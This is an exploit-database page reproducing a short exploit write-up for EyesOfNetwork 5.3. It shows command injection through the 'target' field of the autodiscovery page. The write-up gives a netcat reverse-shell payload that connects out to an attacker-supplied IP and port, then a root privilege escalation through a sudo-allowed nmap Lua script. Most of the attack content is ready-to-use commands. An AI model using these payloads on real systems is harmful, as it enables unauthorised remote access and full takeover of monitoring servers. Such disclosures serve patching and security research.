EyesOfNetwork 5.3 RCE & PrivEsc

CVE Category Price Severity
CVE-2021-32819 CWE-269 $5,000 Critical
Author Risk Exploitation Type Date
Louis Nyffenegger Critical Remote 2021-01-11
CVSS:4.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

EyesOfNetwork 5.3 RCE & PrivEsc
# Exploit Title: EyesOfNetwork 5.3 - RCE & PrivEsc
# Date: 10/01/2021
# Exploit Author: Audencia Business SCHOOL Red Team
# Vendor Homepage:
# Software Link:
# Version: 5.3

#Authentified Romote Code Execution flaw > remote shell > PrivEsc
#An user with acces to "/autodiscover.php" can execute remote commande, get a reverse shell and root the targeted machine.

Initial RCE

In the webpage : https://EyesOfNetwork_IP/lilac/autodiscovery.php

The "target" input is not controled. It's possible tu put any commands after an "&", RCE is possible with a simple netcat commande like : 

& nc -e /bin/sh <IP> <PORT>

The EyesOfNetwork apache user can run "nmap" with sudo privilege and with NOPASSWD attribut, so it's possible to become the root user when using classic PrivEsc methode :
echo 'os.execute("/bin/sh")' > /tmp/nmap.script
sudo nmap --script=/tmp/nmap.script

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum